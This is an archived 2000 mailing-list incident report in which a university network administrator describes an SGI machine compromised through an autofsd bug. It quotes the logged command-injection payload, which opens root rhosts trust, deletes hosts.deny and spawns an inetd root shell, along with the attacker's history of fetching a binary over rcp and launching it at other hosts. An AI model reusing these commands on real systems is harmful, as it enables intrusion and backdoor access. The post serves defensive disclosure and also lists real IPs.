Security Incidents mailing list archives

Hacked by the script kiddie - an ordinary netadmin's day

From: urbanec () CIV ZCU CZ (Jakub Urbanec)
Date: Wed, 21 Jun 2000 10:40:32 +0200


Hi,

One of our machines was hacked on Jun 6 by (probably) the script kiddie
from 216-119-26-75.o1.jps.net :-(

Fortunately he/she left almost everything we needed for identifying the
source of the attack - full syslog dump, history file, suid binaries,
backdoor binaries.

 <attention>Full names/IPs included!</attention>

The method of the hack was an old good SGI autofsd bug - more in syslog:

  autofsd[229]: mount of /hosts/;echo '+ +' > /.rhosts;rm -rf /etc/hosts.deny; \
  echo "courier stream tcp nowait root /bin/sh sh -i" > /tmp/bob;inetd /tmp/bob

followed by:

  login[85169]: root () 216-119-26-75 o1 jps net as root

After he/she added a user 'adm' (thanks for history file!) and installed
binaries - Interesting one is trinoo (DDOS) agent. (as well as 'cocaine',
'gibd00r?', bind shell)

So, here's the history file of user 'adm':

# /bin/ls -C $*; }
# nslookup our.machine.here
# ft
# cd /dev/chr
# ftp charlie.cns.iit.edu
# chmod +sx *
# ./eggdrop doomed.tcl
# exit
# /bin/ls -C $*; }
# ./c
# /bin/ls -C $*; }
# cd /tmp
# ls
# rcp enter@208.243.33.204:/usr/people/enter/irix/c c; chmod 755 c;
# ./c 212.179.33.90 23
# ./c 63.236.135.128 23
# /bin/ls -C $*; }
# ls
# ./c 216.98.156.92 23
#

where ./c is probably 'cocaine'  (courtesy of 'strings' - I'm damn sure I
have seen this application before, but I couldn't find any info about it
- does anybody have a clue?). I have binaries and logs, I can put them on
the web if anybody needs it.

        sorry about the lengthy email, but I think you can be interested
        in how the script kiddies work and DDoS tool gets installed.

P.S. I.   the hacked machine was taken down and installed from the scratch

P.S. II.  IP/hosts mentioned above were already noticed about this
          incident

P.S. III. Never plug default installed SGI box into public net:

"...vanilla SGI boxes screaming "hack me pleeeease, my vendor did such a
great job of making it eeeeeeasy" all over the place..."
               "Playing redir games with ARP and ICMP" by Yuri Volobuev

                                        Jakub CUBA++ Urbanec

--
 .................................................................
 Univerzitni 20   tel.:+420-19-7491538        Jakub Cuba++ Urbanec
 306 14,  Plzen   http://home.zcu.cz/~urbanec          LPS-CIV-ZCU
 Czech Republic

Current thread:

"Quova.net" (Exodus downstream customer) Missouri FreeNet Administration (Jun 17)
- Re: Quova.net M J (Jun 20)
  - Re: Quova.net Fabio Bastiglia Oliva (Jun 20)
    - Re: Quova.net Brett Glass (Jun 20)
    - Hacked by the script kiddie - an ordinary netadmin's day Jakub Urbanec (Jun 21)
    - SV: Hacked by the script kiddie - an ordinary netadmin's day Kim C. Saxvik (Jun 23)
    - Addendum: scanned - strange! Sir Scriptzalot (Jun 21)
  - Re: Quova.net Valdis Kletnieks (Jun 20)
- <Possible follow-ups>
- Re: "Quova.net" (Exodus downstream customer) Rune Kristian Viken (Jun 20)
  - Re: "Quova.net" (Exodus downstream customer) Missouri FreeNet Administration (Jun 22)
    - Re: "Quova.net" (Exodus downstream customer) Cold Fire (Jun 23)
    - Interesting research paper Alfred Huger (Jun 25)
    - DOS attack Bogdan Catalin Donici (Jun 26)
- Re: "Quova.net" (Exodus downstream customer) Nicholas de Jong (Jun 20)